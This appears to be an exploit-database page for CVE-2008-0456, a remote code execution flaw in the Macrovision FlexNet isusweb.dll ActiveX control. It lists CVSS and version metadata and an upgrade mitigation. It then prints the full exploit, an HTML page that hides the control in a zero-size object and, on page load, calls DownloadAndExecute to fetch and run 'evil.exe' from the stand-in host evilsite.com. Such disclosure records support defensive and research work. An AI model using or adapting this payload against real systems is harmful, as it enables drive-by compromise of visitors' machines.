header-logo
Suggest Exploit
vendor:
FlexNet isusweb.dll
by:
e.b.
9.3
CVSS
HIGH
Remote Code Execution
94
CWE
Product Name: FlexNet isusweb.dll
Affected Version From: 6.1.100.61372
Affected Version To: 6.1.100.61372
Patch Exists: YES
Related CWE: CVE-2008-0456
CPE: a:macrovision:flexnet_isusweb_dll
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP SP2
2008

Macrovision FlexNet isusweb.dll DownloadAndExecute Method Exploit

A vulnerability exists in Macrovision FlexNet isusweb.dll which allows remote attackers to execute arbitrary code via the DownloadAndExecute method. This can be exploited by a malicious website to execute arbitrary code on a vulnerable system by using the ActiveX control in Internet Explorer.

Mitigation:

Upgrade to the latest version of Macrovision FlexNet isusweb.dll
Source

Exploit-DB raw data:

<!-- 
Macrovision FlexNet isusweb.dll DownloadAndExecute Method Exploit
Implemented Categories:
Category: Safe for Scripting
Written by e.b.
Tested on Windows XP SP2(fully patched) English, IE6, isusweb.dll version 6.1.100.61372 
-->
<html>
 <head>
  <title>Macrovision FlexNet isusweb.dll DownloadAndExecute Method Exploit</title>
  <script language="JavaScript" defer>
    function Check() {
     	      							  obj.DownloadAndExecute("Bla","{11111111-1111-1111-1111-111111111111}",0,"http://www.evilsite.com/evil.exe","evil.exe");           
          
    } 
   
   </script>
  </head>
 <body onload="JavaScript: return Check();">
    <object id="obj" classid="clsid:1DF951B1-8D40-4894-A04C-66AD824A0EEF" height="0" width="0">
     Unable to create object
    </object>
 </body>
</html>

# milw0rm.com [2008-01-15]